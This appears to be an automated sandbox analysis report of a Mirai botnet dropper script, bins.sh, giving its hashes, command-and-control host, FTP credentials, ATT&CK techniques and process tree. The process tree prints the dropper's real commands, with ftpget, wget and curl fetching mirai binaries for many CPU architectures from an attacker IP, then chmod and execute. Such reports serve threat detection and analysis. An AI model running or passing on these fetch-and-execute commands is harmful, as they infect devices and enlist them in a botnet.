mirai | 1a8b53d206810f02a59c8a0ce14bd3ff49a31f78802ef24e0a3e63fd4e857b2d

Analysis

max time kernel
150s
max time network
151s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
09-08-2024 10:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

f064b93641da57ab1b510a06a284bacd
SHA1

77ebf690333960186de349f1ccd1d6ac9df3748a
SHA256

1a8b53d206810f02a59c8a0ce14bd3ff49a31f78802ef24e0a3e63fd4e857b2d
SHA512

02e4910ae45ca7e75053ede74511bcf417a72a1d15fb60c2e44bae30320b0e89dd98d383aefec312b23dca671892d0e1d6991fb45c5d5af0bcf21d84388c0e54
SSDEEP

48:pccGoQSoGFIAw6YQFaak0xrr6TofZKYn6ra/oSY9QJgnmlt6YLupG:+cGoQSoGFhw6ZFaakwrhcsd/+wa4t

Score

10^/10

mirai mirai botnet discovery

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
154.216.19.139
Port:
21
Username:
anonymous
Password:
busybox@

Extracted

Credentials

Protocol: ftp
Host:
secure.microsoftconnect.net
Port:
21
Username:
anonymous
Password:
busybox@

Extracted

Family

mirai

Botnet

MIRAI

Extracted

Family

mirai

Botnet

MIRAI

secure.microsoftconnect.net

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Contacts a large (20790) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Deletes itself 1 IoCs

pid	Process
854	dvrHelper

Executes dropped EXE 19 IoCs

ioc	pid	Process
/tmp/azvFgdBZ/dvrHelper	761	dvrHelper
/tmp/azvFgdBZ/dvrHelper	794	dvrHelper
/tmp/azvFgdBZ/dvrHelper	799	dvrHelper
/tmp/azvFgdBZ/dvrHelper	806	dvrHelper
/tmp/azvFgdBZ/dvrHelper	837	dvrHelper
/tmp/azvFgdBZ/dvrHelper	841	dvrHelper
/tmp/azvFgdBZ/dvrHelper	845	dvrHelper
/tmp/azvFgdBZ/dvrHelper	849	dvrHelper
/tmp/azvFgdBZ/dvrHelper	854	dvrHelper
/tmp/azvFgdBZ/dvrHelper	865	dvrHelper
/tmp/azvFgdBZ/dvrHelper	869	dvrHelper
/tmp/azvFgdBZ/dvrHelper	876	dvrHelper
/tmp/azvFgdBZ/dvrHelper	880	dvrHelper
/tmp/azvFgdBZ/dvrHelper	884	dvrHelper
/tmp/azvFgdBZ/dvrHelper	888	dvrHelper
/tmp/dvrHelper	893	dvrHelper
/tmp/dvrHelper	898	dvrHelper
/tmp/dvrHelper	903	dvrHelper
/tmp/dvrHelper	908	dvrHelper

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	dvrHelper
File opened for modification	/dev/misc/watchdog	dvrHelper

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	dvrHelper

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	74aushpif022lwcbnaivrcpfc85u4g5c	854	dvrHelper

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery

T1016

description	ioc	Process
File opened for reading	/proc/net/tcp	dvrHelper

Reads runtime system information 61 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/337/fd	dvrHelper
File opened for reading	/proc/711/exe	dvrHelper
File opened for reading	/proc/723/exe	dvrHelper
File opened for reading	/proc/896/exe	dvrHelper
File opened for reading	/proc/913/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/709/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/383/fd	dvrHelper
File opened for reading	/proc/680/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1/fd	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/154/fd	dvrHelper
File opened for reading	/proc/332/fd	dvrHelper
File opened for reading	/proc/436/exe	dvrHelper
File opened for reading	/proc/674/exe	dvrHelper
File opened for reading	/proc/861/exe	dvrHelper
File opened for reading	/proc/935/exe	dvrHelper
File opened for reading	/proc/938/exe	dvrHelper
File opened for reading	/proc/953/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/388/fd	dvrHelper
File opened for reading	/proc/705/exe	dvrHelper
File opened for reading	/proc/928/exe	dvrHelper
File opened for reading	/proc/335/fd	dvrHelper
File opened for reading	/proc/384/fd	dvrHelper
File opened for reading	/proc/678/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/965/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/681/exe	dvrHelper
File opened for reading	/proc/712/exe	dvrHelper
File opened for reading	/proc/742/exe	dvrHelper
File opened for reading	/proc/1032/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/983/exe	dvrHelper
File opened for reading	/proc/692/exe	dvrHelper
File opened for reading	/proc/871/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/176/fd	dvrHelper
File opened for reading	/proc/252/fd	dvrHelper
File opened for reading	/proc/857/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/921/exe	dvrHelper
File opened for reading	/proc/944/exe	dvrHelper
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/971/exe	dvrHelper
File opened for reading	/proc/366/fd	dvrHelper
File opened for reading	/proc/368/fd	dvrHelper
File opened for reading	/proc/710/exe	dvrHelper
File opened for reading	/proc/993/exe	dvrHelper
File opened for reading	/proc/891/exe	dvrHelper
File opened for reading	/proc/927/exe	dvrHelper
File opened for reading	/proc/1003/exe	dvrHelper

Writes file to tmp directory 32 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/dvrHelper	wget
File opened for modification	/tmp/starter	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/azvFgdBZ/dvrHelper	busybox
File opened for modification	/tmp/dvrHelper	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:712
- /bin/rm
  rm starter
  2⤵
  PID:714
- /bin/busybox
  busybox ftpget 154.216.19.139 starter /bins/starter.sh
  2⤵
  - Writes file to tmp directory
  PID:715
- /bin/sh
  sh ./starter
  2⤵
  PID:742
- - /bin/mkdir
    mkdir /tmp/azvFgdBZ
    3⤵
    - Reads runtime system information
    PID:743
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.bin
    3⤵
    - Writes file to tmp directory
    PID:744
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:759
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:761
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv4l
    3⤵
    - Writes file to tmp directory
    PID:764
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:793
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:794
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv5l
    3⤵
    - Writes file to tmp directory
    PID:796
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:798
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:799
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv6l
    3⤵
    - Writes file to tmp directory
    PID:801
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:804
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:806
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.armv7l
    3⤵
    - Writes file to tmp directory
    PID:808
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:836
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:837
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.i586
    3⤵
    - Writes file to tmp directory
    PID:839
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:840
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:841
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.i686
    3⤵
    - Writes file to tmp directory
    PID:843
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:844
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:845
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.m68k
    3⤵
    - Writes file to tmp directory
    PID:847
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:848
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:849
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.mips
    3⤵
    PID:851
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.mipsel
    3⤵
    - Writes file to tmp directory
    PID:852
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:853
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Deletes itself
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Enumerates active TCP sockets
    - Changes its process name
    - Reads system network configuration
    - Reads runtime system information
    PID:854
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.powerpc
    3⤵
    - Writes file to tmp directory
    PID:856
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:864
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:865
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.sh4
    3⤵
    - Writes file to tmp directory
    PID:867
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:868
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:869
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.sparc
    3⤵
    - Writes file to tmp directory
    PID:871
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:875
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:876
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.x86_64
    3⤵
    - Writes file to tmp directory
    PID:878
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:879
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:880
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.gnueabihf
    3⤵
    - Writes file to tmp directory
    PID:882
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:883
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:884
- - /bin/busybox
    busybox ftpget 154.216.19.139 dvrHelper /bins/mirai.arc
    3⤵
    - Writes file to tmp directory
    PID:886
- - /bin/chmod
    chmod 0755 ./dvrHelper
    3⤵
    PID:887
- - /tmp/azvFgdBZ/dvrHelper
    ./dvrHelper
    3⤵
    - Executes dropped EXE
    PID:888
- /bin/rm
  rm dvrHelper
  2⤵
  PID:890
- /usr/bin/wget
  wget http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:891
- /bin/chmod
  chmod 0755 ./dvrHelper
  2⤵
  PID:892
- /tmp/dvrHelper
  ./dvrHelper
  2⤵
  - Executes dropped EXE
  PID:893
- /bin/rm
  rm dvrHelper
  2⤵
  PID:895
- /usr/bin/wget
  wget http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:896
- /bin/chmod
  chmod 0755 ./dvrHelper
  2⤵
  PID:897
- /tmp/dvrHelper
  ./dvrHelper
  2⤵
  - Executes dropped EXE
  PID:898
- /bin/rm
  rm dvrHelper
  2⤵
  PID:900
- /usr/bin/wget
  wget http://web.archive.org/web/20240808120945if_/http://154.216.19.139/bins/mirai.armv5l -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:901
- /bin/chmod
  chmod 0755 ./dvrHelper
  2⤵
  PID:902
- /tmp/dvrHelper
  ./dvrHelper
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm dvrHelper
  2⤵
  PID:905
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121041if_/http://154.216.19.139/bins/mirai.armv6l -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:906
- /bin/chmod
  chmod 0755 ./dvrHelper
  2⤵
  PID:907
- /tmp/dvrHelper
  ./dvrHelper
  2⤵
  - Executes dropped EXE
  PID:908
- /bin/rm
  rm dvrHelper
  2⤵
  PID:910
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121121if_/http://154.216.19.139/bins/mirai.armv7l -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:911
- /bin/rm
  rm dvrHelper
  2⤵
  PID:912
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121230if_/http://154.216.19.139/bins/mirai.i586 -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:913
- /bin/rm
  rm dvrHelper
  2⤵
  PID:914
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121308if_/http://154.216.19.139/bins/mirai.i686 -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:915
- /bin/rm
  rm dvrHelper
  2⤵
  PID:916
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121347if_/http://154.216.19.139/bins/mirai.m68k -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:917
- /bin/rm
  rm dvrHelper
  2⤵
  PID:918
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121419if_/http://154.216.19.139/bins/mirai.mips -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:919
- /bin/rm
  rm dvrHelper
  2⤵
  PID:920
- /usr/bin/wget
  wget http://web.archive.org/web/20240808121832if_/http://154.216.19.139/bins/mirai.mipsel -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:921
- /bin/rm
  rm dvrHelper
  2⤵
  PID:922
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122159if_/http://154.216.19.139/bins/mirai.powerpc -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:923
- /bin/rm
  rm dvrHelper
  2⤵
  PID:924
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122448if_/http://154.216.19.139/bins/mirai.sh4 -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:925
- /bin/rm
  rm dvrHelper
  2⤵
  PID:926
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122636if_/http://154.216.19.139/bins/mirai.sparc -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:927
- /bin/rm
  rm dvrHelper
  2⤵
  PID:928
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122755if_/http://154.216.19.139/bins/mirai.x86_64 -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:929
- /bin/rm
  rm dvrHelper
  2⤵
  PID:930
- /usr/bin/wget
  wget http://web.archive.org/web/20240808122936if_/http://154.216.19.139/bins/mirai.gnueabihf -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:931
- /bin/rm
  rm dvrHelper
  2⤵
  PID:932
- /usr/bin/wget
  wget http://web.archive.org/web/20240808123114if_/http://154.216.19.139/bins/mirai.arc -O dvrHelper
  2⤵
  - Writes file to tmp directory
  PID:933
- /bin/rm
  rm dvrHelper
  2⤵
  PID:934
- /usr/bin/curl
  curl http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:935
- /bin/rm
  rm dvrHelper
  2⤵
  PID:937
- /usr/bin/curl
  curl http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:938
- /bin/rm
  rm dvrHelper
  2⤵
  PID:940
- /usr/bin/curl
  curl http://web.archive.org/web/20240808120945if_/http://154.216.19.139/bins/mirai.armv5l -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:941
- /bin/rm
  rm dvrHelper
  2⤵
  PID:943
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121041if_/http://154.216.19.139/bins/mirai.armv6l -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:944
- /bin/rm
  rm dvrHelper
  2⤵
  PID:946
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121121if_/http://154.216.19.139/bins/mirai.armv7l -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:947
- /bin/rm
  rm dvrHelper
  2⤵
  PID:949
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121230if_/http://154.216.19.139/bins/mirai.i586 -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:950
- /bin/rm
  rm dvrHelper
  2⤵
  PID:952
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121308if_/http://154.216.19.139/bins/mirai.i686 -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:953
- /bin/rm
  rm dvrHelper
  2⤵
  PID:955
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121347if_/http://154.216.19.139/bins/mirai.m68k -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:956
- /bin/rm
  rm dvrHelper
  2⤵
  PID:958
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121419if_/http://154.216.19.139/bins/mirai.mips -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:959
- /bin/rm
  rm dvrHelper
  2⤵
  PID:961
- /usr/bin/curl
  curl http://web.archive.org/web/20240808121832if_/http://154.216.19.139/bins/mirai.mipsel -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:962
- /bin/rm
  rm dvrHelper
  2⤵
  PID:964
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122159if_/http://154.216.19.139/bins/mirai.powerpc -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:965
- /bin/rm
  rm dvrHelper
  2⤵
  PID:967
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122448if_/http://154.216.19.139/bins/mirai.sh4 -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:968
- /bin/rm
  rm dvrHelper
  2⤵
  PID:970
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122636if_/http://154.216.19.139/bins/mirai.sparc -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:971
- /bin/rm
  rm dvrHelper
  2⤵
  PID:973
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122755if_/http://154.216.19.139/bins/mirai.x86_64 -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:974
- /bin/rm
  rm dvrHelper
  2⤵
  PID:976
- /usr/bin/curl
  curl http://web.archive.org/web/20240808122936if_/http://154.216.19.139/bins/mirai.gnueabihf -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:977
- /bin/rm
  rm dvrHelper
  2⤵
  PID:979
- /usr/bin/curl
  curl http://web.archive.org/web/20240808123114if_/http://154.216.19.139/bins/mirai.arc -o dvrHelper
  2⤵
  - Reads runtime system information
  PID:980
- /bin/rm
  rm dvrHelper
  2⤵
  PID:982
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -O dvrHelper
  2⤵
  PID:983
- /bin/rm
  rm dvrHelper
  2⤵
  PID:984
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -O dvrHelper
  2⤵
  PID:985
- /bin/rm
  rm dvrHelper
  2⤵
  PID:986
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808120945if_/http://154.216.19.139/bins/mirai.armv5l -O dvrHelper
  2⤵
  PID:987
- /bin/rm
  rm dvrHelper
  2⤵
  PID:988
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121041if_/http://154.216.19.139/bins/mirai.armv6l -O dvrHelper
  2⤵
  PID:989
- /bin/rm
  rm dvrHelper
  2⤵
  PID:990
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121121if_/http://154.216.19.139/bins/mirai.armv7l -O dvrHelper
  2⤵
  PID:991
- /bin/rm
  rm dvrHelper
  2⤵
  PID:992
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121230if_/http://154.216.19.139/bins/mirai.i586 -O dvrHelper
  2⤵
  PID:993
- /bin/rm
  rm dvrHelper
  2⤵
  PID:994
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121308if_/http://154.216.19.139/bins/mirai.i686 -O dvrHelper
  2⤵
  PID:995
- /bin/rm
  rm dvrHelper
  2⤵
  PID:996
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121347if_/http://154.216.19.139/bins/mirai.m68k -O dvrHelper
  2⤵
  PID:997
- /bin/rm
  rm dvrHelper
  2⤵
  PID:998
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121419if_/http://154.216.19.139/bins/mirai.mips -O dvrHelper
  2⤵
  PID:999
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1000
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808121832if_/http://154.216.19.139/bins/mirai.mipsel -O dvrHelper
  2⤵
  PID:1001
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1002
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122159if_/http://154.216.19.139/bins/mirai.powerpc -O dvrHelper
  2⤵
  PID:1003
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1004
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122448if_/http://154.216.19.139/bins/mirai.sh4 -O dvrHelper
  2⤵
  PID:1005
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1006
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122636if_/http://154.216.19.139/bins/mirai.sparc -O dvrHelper
  2⤵
  PID:1007
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1008
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122755if_/http://154.216.19.139/bins/mirai.x86_64 -O dvrHelper
  2⤵
  PID:1009
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1010
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122936if_/http://154.216.19.139/bins/mirai.gnueabihf -O dvrHelper
  2⤵
  PID:1011
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1012
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808123114if_/http://154.216.19.139/bins/mirai.arc -O dvrHelper
  2⤵
  PID:1013
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1014
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808120223if_/http://154.216.19.139/bins/mirai.bin -o dvrHelper
  2⤵
  PID:1015
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1016
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808120646if_/http://154.216.19.139/bins/mirai.armv4l -o dvrHelper
  2⤵
  PID:1017
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1018
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808120945if_/http://154.216.19.139/bins/mirai.armv5l -o dvrHelper
  2⤵
  PID:1019
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1020
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121041if_/http://154.216.19.139/bins/mirai.armv6l -o dvrHelper
  2⤵
  PID:1021
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1022
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121121if_/http://154.216.19.139/bins/mirai.armv7l -o dvrHelper
  2⤵
  PID:1023
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1024
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121230if_/http://154.216.19.139/bins/mirai.i586 -o dvrHelper
  2⤵
  PID:1025
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1026
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121308if_/http://154.216.19.139/bins/mirai.i686 -o dvrHelper
  2⤵
  PID:1027
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1028
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121347if_/http://154.216.19.139/bins/mirai.m68k -o dvrHelper
  2⤵
  PID:1029
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1030
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121419if_/http://154.216.19.139/bins/mirai.mips -o dvrHelper
  2⤵
  PID:1031
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1032
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808121832if_/http://154.216.19.139/bins/mirai.mipsel -o dvrHelper
  2⤵
  PID:1033
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1034
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808122159if_/http://154.216.19.139/bins/mirai.powerpc -o dvrHelper
  2⤵
  PID:1035
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1036
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808122448if_/http://154.216.19.139/bins/mirai.sh4 -o dvrHelper
  2⤵
  PID:1037
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1038
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808122636if_/http://154.216.19.139/bins/mirai.sparc -o dvrHelper
  2⤵
  PID:1039
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1040
- /bin/busybox
  busybox curl http://web.archive.org/web/20240808122755if_/http://154.216.19.139/bins/mirai.x86_64 -o dvrHelper
  2⤵
  PID:1041
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1042
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808122936if_/http://154.216.19.139/bins/mirai.gnueabihf -O dvrHelper
  2⤵
  PID:1043
- /bin/rm
  rm dvrHelper
  2⤵
  PID:1044
- /bin/busybox
  busybox wget http://web.archive.org/web/20240808123114if_/http://154.216.19.139/bins/mirai.arc -O dvrHelper
  2⤵
  PID:1045

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/azvFgdBZ/dvrHelper

Filesize
914KB

MD5
6a98f1f740434bb0d3da9a431bb7fefd

SHA1
4d7242cbfa380596d0292c9c9be847862cdb24f1

SHA256
ad3c19afec823def5b53f480eb919b75129dc820dbead758ecc5097d3ddbacef

SHA512
